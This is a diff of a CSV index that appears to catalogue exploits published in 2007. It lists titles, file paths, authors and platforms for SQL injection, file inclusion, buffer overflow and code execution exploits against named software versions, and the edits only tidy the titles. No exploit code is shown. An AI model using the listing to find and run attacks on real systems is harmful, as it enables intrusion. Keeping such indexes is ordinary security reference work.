+4376,platforms/php/webapps/4376.txt,"TLM CMS 3.2 - Multiple SQL Injection Vulnerabilities",2007-09-08,k1tk4t,php,webapps,0 +4377,platforms/php/webapps/4377.txt,"Focus/SIS 1.0/2.2 - Remote File Inclusion Vulnerabilities",2007-09-08,"ThE TiGeR",php,webapps,0 +4378,platforms/php/webapps/4378.htm,"fuzzylime CMS 3.0 - Local File Inclusion",2007-09-08,"not sec group",php,webapps,0 4379,platforms/windows/dos/4379.html,"Microsoft SQL Server Distributed Management Objects (sqldmo.dll) BoF",2007-09-08,rgod,windows,dos,0 4380,platforms/php/webapps/4380.txt,"Sisfo Kampus 2006 - (blanko.preview.php) Local File Disclosure",2007-09-08,QTRinux,php,webapps,0 4381,platforms/php/webapps/4381.txt,"Txx CMS 0.2 - Multiple Remote File Inclusion Vulnerabilities",2007-09-08,"Nice Name Crew",php,webapps,0 4382,platforms/php/webapps/4382.txt,"phpress 0.2.0 - (adisplay.php lang) Local File Inclusion",2007-09-08,"Nice Name Crew",php,webapps,0 4383,platforms/php/webapps/4383.txt,"Joomla Component Restaurante Remote File Upload",2007-09-08,"Cold Zero",php,webapps,0 4384,platforms/php/webapps/4384.txt,"WebED 0.8999a - Multiple Remote File Inclusion Vulnerabilities",2007-09-08,MhZ91,php,webapps,0 -4385,platforms/php/webapps/4385.txt,"AuraCMS 1.5rc - Multiple Remote SQL Injection Vulnerabilities",2007-09-09,k1tk4t,php,webapps,0 +4385,platforms/php/webapps/4385.txt,"AuraCMS 1.5rc - Multiple SQL Injection Vulnerabilities",2007-09-09,k1tk4t,php,webapps,0 4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 - (dwoprn.php f) Remote File Download",2007-09-10,k-one,php,webapps,0 4387,platforms/php/webapps/4387.txt,"phpRealty 0.02 - (MGR) Multiple Remote File Inclusion Vulnerabilities",2007-09-10,QTRinux,php,webapps,0 -4388,platforms/windows/remote/4388.html,"Ultra Crypto Component (CryptoX.dll <= 2.0) SaveToFile() Inscure Method",2007-09-10,shinnai,windows,remote,0 -4389,platforms/windows/remote/4389.html,"Ultra Crypto Component (CryptoX.dll <= 2.0) Remote BoF Exploit",2007-09-10,shinnai,windows,remote,0 +4388,platforms/windows/remote/4388.html,"Ultra Crypto Component (CryptoX.dll 2.0) SaveToFile() Inscure Method",2007-09-10,shinnai,windows,remote,0 +4389,platforms/windows/remote/4389.html,"Ultra Crypto Component (CryptoX.dll 2.0) Remote BoF Exploit",2007-09-10,shinnai,windows,remote,0 4390,platforms/php/webapps/4390.txt,"AuraCMS 2.1 - Remote File Attachment / LFI Vulnerabilities",2007-09-10,k1tk4t,php,webapps,0 -4391,platforms/multiple/remote/4391.c,"Lighttpd <= 1.4.16 FastCGI Header Overflow Remote Exploit",2007-09-10,"Mattias Bengtsson",multiple,remote,0 -4392,platforms/multiple/local/4392.txt,"PHP <= 4.4.7 / 5.2.3 - MySQL/MySQLi Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0 +4391,platforms/multiple/remote/4391.c,"Lighttpd 1.4.16 FastCGI Header Overflow Remote Exploit",2007-09-10,"Mattias Bengtsson",multiple,remote,0 +4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQLi Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0 4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - (PDWizard.ocx) Remote Command Execution",2007-09-11,shinnai,windows,remote,0 4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit",2007-09-11,shinnai,windows,remote,0 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - (root_path) Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0 -4396,platforms/php/webapps/4396.txt,"X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities",2007-09-11,aLiiF,php,webapps,0 +4396,platforms/php/webapps/4396.txt,"X-Cart ? Multiple Remote File Inclusion Vulnerabilities",2007-09-11,aLiiF,php,webapps,0 4397,platforms/php/webapps/4397.rb,"WordPress Multiple Versions - Pwnpress Exploitation Tookit (0.2pub)",2007-09-14,"Lance M. Havok",php,webapps,0 4398,platforms/windows/remote/4398.html,"Microsoft SQL Server Distributed Management Objects BoF Exploit",2007-09-12,96sysim,windows,remote,0 4399,platforms/multiple/remote/4399.html,"Apple Quicktime (Multiple Browsers) Command Execution PoC (0Day)",2007-09-12,pdp,multiple,remote,0 -4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - (id) Remote SQL Injection",2007-09-13,Houssamix,php,webapps,0 +4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - (id) SQL Injection",2007-09-13,Houssamix,php,webapps,0 4401,platforms/php/webapps/4401.txt,"Joomla Component joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0 4403,platforms/windows/dos/4403.py,"JetCast Server 2.0.0.4308 - Remote Denial of Service Exploit",2007-09-13,vCore,windows,dos,0 -4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - (skill_delete) Remote SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0 -4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - (settings.inc.php approot) RFI",2007-09-14,"arfis project",php,webapps,0 +4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - (skill_delete) SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0 +4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - (settings.inc.php approot) Remote File Inclusion",2007-09-14,"arfis project",php,webapps,0 4406,platforms/php/webapps/4406.txt,"phpFFL 1.24 PHPFFL_FILE_ROOT Remote File Inclusion Vulnerabilities",2007-09-14,Dj7xpl,php,webapps,0 -4407,platforms/php/webapps/4407.java,"PHP Webquest <= 2.5 - (id_actividad) Remote SQL Injection Exploit",2007-09-14,D4real_TeaM,php,webapps,0 -4408,platforms/php/webapps/4408.pl,"JBlog 1.0 - (index.php id) Remote SQL Injection Exploit",2007-09-14,s4mi,php,webapps,0 +4407,platforms/php/webapps/4407.java,"PHP Webquest 2.5 - (id_actividad) SQL Injection Exploit",2007-09-14,D4real_TeaM,php,webapps,0 +4408,platforms/php/webapps/4408.pl,"JBlog 1.0 - (index.php id) SQL Injection Exploit",2007-09-14,s4mi,php,webapps,0 4409,platforms/windows/dos/4409.html,"HP ActiveX (hpqutil.dll ListFiles hpqutil.dll) Remote Heap Overflow PoC",2007-09-14,GOODFELLAS,windows,dos,0 -4410,platforms/php/webapps/4410.php,"Gelato (index.php post) Remote SQL Injection Exploit",2007-09-14,s0cratex,php,webapps,0 +4410,platforms/php/webapps/4410.php,"Gelato (index.php post) SQL Injection Exploit",2007-09-14,s0cratex,php,webapps,0 4411,platforms/php/webapps/4411.txt,"Chupix CMS 0.2.3 - (download.php) Remote File Disclosure",2007-09-15,GoLd_M,php,webapps,0 -4412,platforms/php/webapps/4412.pl,"KwsPHP 1.0 - (login.php) Remote SQL Injection Exploit",2007-09-15,s4mi,php,webapps,0 +4412,platforms/php/webapps/4412.pl,"KwsPHP 1.0 - (login.php) SQL Injection Exploit",2007-09-15,s4mi,php,webapps,0 4413,platforms/php/webapps/4413.pl,"KwsPHP 1.0 Member_Space Module SQL Injection Exploit",2007-09-15,s4mi,php,webapps,0 -4414,platforms/php/webapps/4414.pl,"KwsPHP 1.0 stats Module Remote SQL Injection Exploit",2007-09-15,s4mi,php,webapps,0 +4414,platforms/php/webapps/4414.pl,"KwsPHP 1.0 stats Module SQL Injection Exploit",2007-09-15,s4mi,php,webapps,0 4415,platforms/php/webapps/4415.txt,"joomla component flash fun! 1.0 - Remote File Inclusion",2007-09-15,Morgan,php,webapps,0 4416,platforms/php/webapps/4416.txt,"joomla component joom12pic 1.0 - Remote File Inclusion",2007-09-16,Morgan,php,webapps,0 -4417,platforms/php/webapps/4417.txt,"SimpCMS - (keyword) Remote SQL Injection",2007-09-16,"Cold Zero",php,webapps,0 +4417,platforms/php/webapps/4417.txt,"SimpCMS - (keyword) SQL Injection",2007-09-16,"Cold Zero",php,webapps,0 4418,platforms/php/webapps/4418.sh,"Omnistar Article Manager Software (article.php) SQL Injection Exploit",2007-09-16,"Cold Zero",php,webapps,0 -4419,platforms/php/webapps/4419.php,"Shop-Script FREE <= 2.0 - Remote Command Execution Exploit",2007-09-17,InATeam,php,webapps,0 +4419,platforms/php/webapps/4419.php,"Shop-Script FREE 2.0 - Remote Command Execution Exploit",2007-09-17,InATeam,php,webapps,0 4420,platforms/windows/remote/4420.html,"MW6 Technologies QRCode ActiveX 3.0 - Remote File Overwrite Exploit",2007-09-18,shinnai,windows,remote,0 -4421,platforms/php/webapps/4421.txt,"phpsyncml <= 0.1.2 - Remote File Include Vulnerabilities",2007-09-18,S.W.A.T.,php,webapps,0 -4422,platforms/php/webapps/4422.txt,"KwsPHP 1.0 sondages Module Remote SQL Injection",2007-09-18,Houssamix,php,webapps,0 +4421,platforms/php/webapps/4421.txt,"phpsyncml 0.1.2 - Remote File Inclusion Vulnerabilities",2007-09-18,S.W.A.T.,php,webapps,0 +4422,platforms/php/webapps/4422.txt,"KwsPHP 1.0 sondages Module SQL Injection",2007-09-18,Houssamix,php,webapps,0 4423,platforms/php/webapps/4423.txt,"modifyform (modifyform.html) Remote File Inclusion",2007-09-18,mozi,php,webapps,0 4424,platforms/windows/remote/4424.html,"Apple Quicktime /w IE .qtl Version XAS - Remote Exploit PoC",2007-09-18,"Aviv Raff",windows,remote,0 4425,platforms/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo Blind SQL Injection Exploit",2007-09-18,nexen,php,webapps,0 @@ -4075,88 +4075,88 @@ id,file,description,date,author,platform,type,port 4427,platforms/windows/remote/4427.html,"jetAudio 7.x - ActiveX DownloadFromMusicStore() Code Execution Exploit",2007-09-19,h07,windows,remote,0 4428,platforms/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download",2007-09-19,shinnai,windows,remote,0 4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit",2007-09-19,void,windows,remote,143 -4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - RFI",2007-09-19,BiNgZa,php,webapps,0 +4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps,0 4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution Exploit",2007-09-19,shinnai,windows,local,0 4432,platforms/multiple/dos/4432.html,"Sun jre1.6.0_X isInstalled.dnsResolve Function Overflow PoC",2007-09-19,"YAG KOHHA",multiple,dos,0 -4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - (userreviews.php abc) Remote SQL Injection Exploit",2007-09-19,str0ke,php,webapps,0 -4434,platforms/php/webapps/4434.txt,"phpBB Plus <= 1.53 - (phpbb_root_path) Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0 -4435,platforms/php/webapps/4435.pl,"Flip <= 3.0 Remoe Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0 -4436,platforms/php/webapps/4436.pl,"Flip <= 3.0 - Remote Password Hash Disclosure Exploit",2007-09-20,undefined1_,php,webapps,0 -4437,platforms/linux/remote/4437.c,"Lighttpd <= 1.4.17 FastCGI Header Overflow Remote Exploit",2007-09-20,Andi,linux,remote,80 +4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - (userreviews.php abc) SQL Injection Exploit",2007-09-19,str0ke,php,webapps,0 +4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - (phpbb_root_path) Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0 +4435,platforms/php/webapps/4435.pl,"Flip 3.0 Remoe Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0 +4436,platforms/php/webapps/4436.pl,"Flip 3.0 - Remote Password Hash Disclosure Exploit",2007-09-20,undefined1_,php,webapps,0 +4437,platforms/linux/remote/4437.c,"Lighttpd 1.4.17 FastCGI Header Overflow Remote Exploit",2007-09-20,Andi,linux,remote,80 4438,platforms/windows/remote/4438.cpp,"IPSwitch IMail Server 8.0x Remote Heap Overflow Exploit",2007-09-21,axis,windows,remote,25 4439,platforms/php/webapps/4439.txt,"neuron news 1.0 - (index.php q) Local File Inclusion",2007-09-21,Dj7xpl,php,webapps,0 4440,platforms/php/webapps/4440.txt,"Joomla Component com_slideshow Remote File Inclusion",2007-09-21,ShockShadow,php,webapps,0 -4441,platforms/php/webapps/4441.txt,"izicontents <= rc6 - (RFI/LFI) Multiple Vulnerabilities",2007-09-21,irk4z,php,webapps,0 +4441,platforms/php/webapps/4441.txt,"izicontents rc6 - (RFI/LFI) Multiple Vulnerabilities",2007-09-21,irk4z,php,webapps,0 4442,platforms/php/webapps/4442.txt,"CMS Made Simple 1.2 - Remote Code Execution",2007-09-21,irk4z,php,webapps,0 -4443,platforms/php/webapps/4443.txt,"Clansphere 2007.4 - (cat_id) Remote SQL Injection",2007-09-22,IHTeam,php,webapps,0 -4444,platforms/php/webapps/4444.txt,"Black Lily 2007 - (products.php class) Remote SQL Injection",2007-09-22,VerY-SecReT,php,webapps,0 +4443,platforms/php/webapps/4443.txt,"Clansphere 2007.4 - (cat_id) SQL Injection",2007-09-22,IHTeam,php,webapps,0 +4444,platforms/php/webapps/4444.txt,"Black Lily 2007 - (products.php class) SQL Injection",2007-09-22,VerY-SecReT,php,webapps,0 4445,platforms/windows/remote/4445.html,"EasyMail MessagePrinter Object (emprint.DLL 6.0.1.0) BoF Exploit",2007-09-23,rgod,windows,remote,0 4446,platforms/php/webapps/4446.txt,"Wordsmith 1.1b - (config.inc.php _path) Remote File Inclusion",2007-09-23,ShockShadow,php,webapps,0 4447,platforms/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment 1.0 - LFI",2007-09-23,"BorN To K!LL",php,webapps,0 4448,platforms/php/webapps/4448.txt,"helplink 0.1.0 - (show.php) Remote File Inclusion",2007-09-23,GoLd_M,php,webapps,0 -4449,platforms/php/webapps/4449.txt,"phpFullAnnu (PFA) 6.0 - Remote SQL Injection",2007-09-23,IHTeam,php,webapps,0 +4449,platforms/php/webapps/4449.txt,"phpFullAnnu (PFA) 6.0 - SQL Injection",2007-09-23,IHTeam,php,webapps,0 4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 - (If-Modified-Since) Remote BoF Exploit (0Day)",2007-09-24,h07,windows,remote,80 4451,platforms/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusion Vulnerabilities",2007-09-24,BiNgZa,php,webapps,0 4452,platforms/windows/remote/4452.html,"AskJeeves Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow Exploit",2007-09-24,"Joey Mengele",windows,remote,0 4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd - (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites",2007-09-24,shinnai,windows,remote,0 -4454,platforms/php/webapps/4454.txt,"sk.log <= 0.5.3 - (skin_url) Remote File Inclusion",2007-09-24,w0cker,php,webapps,0 -4455,platforms/windows/remote/4455.pl,"Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit",2008-03-11,titon,windows,remote,0 +4454,platforms/php/webapps/4454.txt,"sk.log 0.5.3 - (skin_url) Remote File Inclusion",2007-09-24,w0cker,php,webapps,0 +4455,platforms/windows/remote/4455.pl,"Motorola Timbuktu Pro 8.6.5 File Deletion/Creation Exploit",2008-03-11,titon,windows,remote,0 4456,platforms/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion Vulnerabilities",2007-09-26,kezzap66345,php,webapps,0 -4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS (id) Remote SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps,0 -4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - (notas.asp nota_id) Remote SQL Injection",2007-09-26,ka0x,asp,webapps,0 -4459,platforms/php/webapps/4459.txt,"ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0 +4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS (id) SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps,0 +4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - (notas.asp nota_id) SQL Injection",2007-09-26,ka0x,asp,webapps,0 +4459,platforms/php/webapps/4459.txt,"ActiveKB Knowledgebase 2.? (catId) SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0 4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Local Root Exploit",2007-09-27,"Robert Swiecki",linux,local,0 4461,platforms/php/webapps/4461.txt,"lustig.cms BETA 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0 4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0 4463,platforms/php/webapps/4463.txt,"integramod nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0 4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 - (SRC_PATH) Remote File Inclusion",2007-09-28,w0cker,php,webapps,0 -4465,platforms/php/webapps/4465.txt,"public media manager <= 1.3 - Remote File Inclusion",2007-09-28,0in,php,webapps,0 -4466,platforms/php/webapps/4466.php,"Zomplog <= 3.8.1 upload_files.php Arbitrary File Upload Exploit",2007-09-28,InATeam,php,webapps,0 -4467,platforms/php/webapps/4467.pl,"MDPro 1.0.76 - Remote SQL Injection Exploit",2007-09-29,undefined1_,php,webapps,0 +4465,platforms/php/webapps/4465.txt,"public media manager 1.3 - Remote File Inclusion",2007-09-28,0in,php,webapps,0 +4466,platforms/php/webapps/4466.php,"Zomplog 3.8.1 upload_files.php Arbitrary File Upload Exploit",2007-09-28,InATeam,php,webapps,0 +4467,platforms/php/webapps/4467.pl,"MDPro 1.0.76 - SQL Injection Exploit",2007-09-29,undefined1_,php,webapps,0 4468,platforms/windows/remote/4468.html,"Tor < 0.1.2.16 ControlPort Remote Rewrite Exploit",2007-09-29,elgCrew,windows,remote,0 -4469,platforms/php/webapps/4469.txt,"Mambo Component Mambads <= 1.5 - Remote SQL Injection",2007-09-29,Sniper456,php,webapps,0 -4470,platforms/php/webapps/4470.txt,"mxBB Module mx_glance 2.3.3 - Remote File Include",2007-09-29,bd0rk,php,webapps,0 +4469,platforms/php/webapps/4469.txt,"Mambo Component Mambads 1.5 - SQL Injection",2007-09-29,Sniper456,php,webapps,0 +4470,platforms/php/webapps/4470.txt,"mxBB Module mx_glance 2.3.3 - Remote File Inclusion",2007-09-29,bd0rk,php,webapps,0 4471,platforms/php/webapps/4471.txt,"phpBB Mod OpenID 0.2.0 - BBStore.php Remote File Inclusion",2007-09-30,"Mehmet Ince",php,webapps,0 4472,platforms/php/webapps/4472.txt,"actSite 1.56 - (news.php) Local File Inclusion",2007-10-01,DNX,php,webapps,0 4473,platforms/php/webapps/4473.txt,"actSite 1.991 Beta (base.php) Remote File Inclusion",2007-10-01,DNX,php,webapps,0 4474,platforms/windows/dos/4474.html,"EDraw Office Viewer Component 5.3 FtpDownloadFile() Remote BoF",2007-10-01,shinnai,windows,dos,0 4475,platforms/php/webapps/4475.php,"PHP-Fusion module Expanded Calendar 2.x SQL Injection Exploit",2007-10-01,Matrix86,php,webapps,0 -4476,platforms/php/webapps/4476.txt,"Segue CMS <= 1.8.4 index.php Remote File Inclusion",2007-10-01,kezzap66345,php,webapps,0 +4476,platforms/php/webapps/4476.txt,"Segue CMS 1.8.4 index.php Remote File Inclusion",2007-10-01,kezzap66345,php,webapps,0 4477,platforms/php/webapps/4477.txt,"php wcms XT 0.0.7 - Multiple Remote File Inclusion Vulnerabilities",2007-10-01,kezzap66345,php,webapps,0 4478,platforms/linux/remote/4478.c,"smbftpd 0.96 SMBDirList-function Remote Format String Exploit",2007-10-01,"Jerry Illikainen",linux,remote,21 4479,platforms/windows/dos/4479.html,"CyberLink PowerDVD CreateNewFile Arbitrary Remote Rewrite DoS",2007-10-01,rgod,windows,dos,0 4480,platforms/php/webapps/4480.pl,"MultiCart 1.0 - Remote Blind SQL Injection Exploit",2007-10-02,k1tk4t,php,webapps,0 4481,platforms/php/webapps/4481.txt,"Poppawid 2.7 - (form) Remote File Inclusion",2007-10-02,0in,php,webapps,0 -4482,platforms/php/webapps/4482.txt,"Web Template Management System 1.3 - Remote SQL Injection",2007-10-04,bius,php,webapps,0 -4483,platforms/php/webapps/4483.txt,"Ossigeno CMS <= 2.2a3 - (footer.php) Remote File Inclusion",2007-10-04,"Nice Name Crew",php,webapps,0 +4482,platforms/php/webapps/4482.txt,"Web Template Management System 1.3 - SQL Injection",2007-10-04,bius,php,webapps,0 +4483,platforms/php/webapps/4483.txt,"Ossigeno CMS 2.2a3 - (footer.php) Remote File Inclusion",2007-10-04,"Nice Name Crew",php,webapps,0 4484,platforms/windows/remote/4484.pl,"FSFDT v3.000 d9 - (HELP) Remote Buffer Overflow Exploit",2007-10-04,weak,windows,remote,0 -4485,platforms/php/webapps/4485.txt,"Trionic Cite CMS <= 1.2rev9 - Remote File Inclusion",2007-10-05,GoLd_M,php,webapps,0 -4486,platforms/asp/webapps/4486.txt,"Furkan Tastan Blog Remote SQL Injection",2007-10-05,CyberGhost,asp,webapps,0 +4485,platforms/php/webapps/4485.txt,"Trionic Cite CMS 1.2rev9 - Remote File Inclusion",2007-10-05,GoLd_M,php,webapps,0 +4486,platforms/asp/webapps/4486.txt,"Furkan Tastan Blog SQL Injection",2007-10-05,CyberGhost,asp,webapps,0 4487,platforms/windows/remote/4487.html,"Pegasus Imaging ThumbnailXpress 1.0 - Remote Arbitrary File Deletion",2007-10-05,shinnai,windows,remote,0 4488,platforms/windows/remote/4488.html,"Pegasus Imaging ImagXpress 8.0 - Remote Arbitrary File Overwrite",2007-10-05,shinnai,windows,remote,0 4489,platforms/php/webapps/4489.txt,"joomla panoramic component 1.0 - Remote File Inclusion",2007-10-06,NoGe,php,webapps,0 4490,platforms/php/webapps/4490.txt,"else if CMS 0.6 - Multiple Vulnerabilities",2007-10-06,"HACKERS PAL",php,webapps,0 4491,platforms/php/webapps/4491.php,"CMS Creamotion (securite.php) Remote File Inclusion Exploit",2007-10-06,"HACKERS PAL",php,webapps,0 -4492,platforms/php/webapps/4492.txt,"Picturesolution <= 2.1 - (config.php path) Remote File Inclusion",2007-10-06,Mogatil,php,webapps,0 +4492,platforms/php/webapps/4492.txt,"Picturesolution 2.1 - (config.php path) Remote File Inclusion",2007-10-06,Mogatil,php,webapps,0 4493,platforms/php/webapps/4493.txt,"SkaDate Online 5.0/6.0 - Remote File Disclosure",2007-10-06,SnIpEr_SA,php,webapps,0 -4494,platforms/php/webapps/4494.txt,"Verlihub Control Panel <= 1.7.x - Local File Inclusion",2007-10-07,TEAMELITE,php,webapps,0 +4494,platforms/php/webapps/4494.txt,"Verlihub Control Panel 1.7.x - Local File Inclusion",2007-10-07,TEAMELITE,php,webapps,0 4495,platforms/php/webapps/4495.txt,"idmos-phoenix CMS (aural.php) Remote File Inclusion",2007-10-07,"HACKERS PAL",php,webapps,0 -4496,platforms/php/webapps/4496.txt,"Joomla Flash Image Gallery Component - RFI",2007-10-07,"Mehmet Ince",php,webapps,0 +4496,platforms/php/webapps/4496.txt,"Joomla Flash Image Gallery Component - Remote File Inclusion",2007-10-07,"Mehmet Ince",php,webapps,0 4497,platforms/php/webapps/4497.txt,"joomla component wmtportfolio 1.0 - Remote File Inclusion",2007-10-07,NoGe,php,webapps,0 -4498,platforms/windows/dos/4498.pl,"wzdftpd <= 0.8.0 - (USER) Remote Denial of Service Exploit",2007-10-07,k1tk4t,windows,dos,0 +4498,platforms/windows/dos/4498.pl,"wzdftpd 0.8.0 - (USER) Remote Denial of Service Exploit",2007-10-07,k1tk4t,windows,dos,0 4499,platforms/php/webapps/4499.txt,"joomla component mosmedialite451 - Remote File Inclusion",2007-10-08,k1n9k0ng,php,webapps,0 4500,platforms/php/webapps/4500.txt,"torrenttrader classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0 -4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 galerie.php Remote SQL Injection Exploit",2007-10-08,"[PHCN] Mahjong",php,webapps,0 +4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 galerie.php SQL Injection Exploit",2007-10-08,"[PHCN] Mahjong",php,webapps,0 4502,platforms/php/webapps/4502.txt,"xKiosk 3.0.1i (xkurl.php PEARPATH) Remote File Inclusion",2007-10-08,"BorN To K!LL",php,webapps,0 4503,platforms/php/webapps/4503.txt,"LiveAlbum 0.9.0 common.php Remote File Inclusion",2007-10-08,S.W.A.T.,php,webapps,0 -4504,platforms/php/webapps/4504.txt,"Softbiz Jobs & Recruitment Remote SQL Injection",2007-10-08,"Khashayar Fereidani",php,webapps,0 +4504,platforms/php/webapps/4504.txt,"Softbiz Jobs & Recruitment SQL Injection",2007-10-08,"Khashayar Fereidani",php,webapps,0 4505,platforms/php/webapps/4505.php,"LightBlog 8.4.1.1 - Remote Code Execution Exploit",2007-10-09,BlackHawk,php,webapps,0 4506,platforms/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 - FPOLE.OCX Arbitrary Command Execution",2007-10-09,shinnai,windows,remote,0 4507,platforms/php/webapps/4507.txt,"joomla component mp3 allopass 1.0 - Remote File Inclusion",2007-10-10,NoGe,php,webapps,0 -4508,platforms/php/webapps/4508.txt,"Joomla Component JContentSubscription 1.5.8 - Multiple RFI Vulnerabilities",2007-10-10,NoGe,php,webapps,0 +4508,platforms/php/webapps/4508.txt,"Joomla Component JContentSubscription 1.5.8 - Multiple Remote File Inclusion Vulnerabilities",2007-10-10,NoGe,php,webapps,0 4509,platforms/php/webapps/4509.txt,"TikiWiki 1.9.8 - Remote PHP Injection",2007-10-10,ShAnKaR,php,webapps,0 -4510,platforms/php/webapps/4510.txt,"Drupal <= 5.2 - PHP Zend Hash Exploitation Vector",2007-10-10,ShAnKaR,php,webapps,0 -4511,platforms/php/webapps/4511.pl,"cpDynaLinks 1.02 category.php Remote SQL Injection Exploit",2007-10-10,ka0x,php,webapps,0 +4510,platforms/php/webapps/4510.txt,"Drupal 5.2 - PHP Zend Hash Exploitation Vector",2007-10-10,ShAnKaR,php,webapps,0 +4511,platforms/php/webapps/4511.pl,"cpDynaLinks 1.02 category.php SQL Injection Exploit",2007-10-10,ka0x,php,webapps,0 4512,platforms/php/webapps/4512.txt,"nuseo php enterprise 1.6 - Remote File Inclusion",2007-10-10,BiNgZa,php,webapps,0 4513,platforms/php/webapps/4513.php,"Php-Stats 0.1.9.2 - Multiple Vulnerabilities",2007-10-10,EgiX,php,webapps,0 4514,platforms/linux/remote/4514.c,"Eggdrop Server Module Message Handling Remote BoF Exploit",2007-10-10,bangus/magnum,linux,remote,0 @@ -4165,46 +4165,46 @@ id,file,description,date,author,platform,type,port 4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0 4518,platforms/php/webapps/4518.txt,"WebDesktop 0.1 - Remote File Inclusion Vulnerabilities",2007-10-11,S.W.A.T.,php,webapps,0 4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 client.php Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0 -4520,platforms/php/webapps/4520.txt,"PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion",2007-10-11,0in,php,webapps,0 +4520,platforms/php/webapps/4520.txt,"PicoFlat CMS 0.4.14 index.php Remote File Inclusion",2007-10-11,0in,php,webapps,0 4521,platforms/php/webapps/4521.txt,"Joomla Flash uploader 2.5.1 - Remote File Inclusion Vulnerabilities",2007-10-11,mdx,php,webapps,0 4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0 -4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Newsletter Module Remote SQL Injection Exploit",2007-10-11,s4mi,php,webapps,0 +4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Newsletter Module SQL Injection Exploit",2007-10-11,s4mi,php,webapps,0 4524,platforms/php/webapps/4524.txt,"joomla component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps,0 -4525,platforms/php/webapps/4525.pl,"TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0 +4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0 4526,platforms/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method Exploit",2007-10-12,Katatafish,windows,remote,0 -4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script Remote SQL Injection",2007-10-13,"Khashayar Fereidani",php,webapps,0 -4528,platforms/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module Remote SQL Injection",2007-10-13,"Mehmet Ince",php,webapps,0 -4529,platforms/cgi/webapps/4529.txt,"WWWISIS <= 7.1 - (IsisScript) Local File Disclosure / XSS Vulnerabilities",2007-10-13,JosS,cgi,webapps,0 +4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script SQL Injection",2007-10-13,"Khashayar Fereidani",php,webapps,0 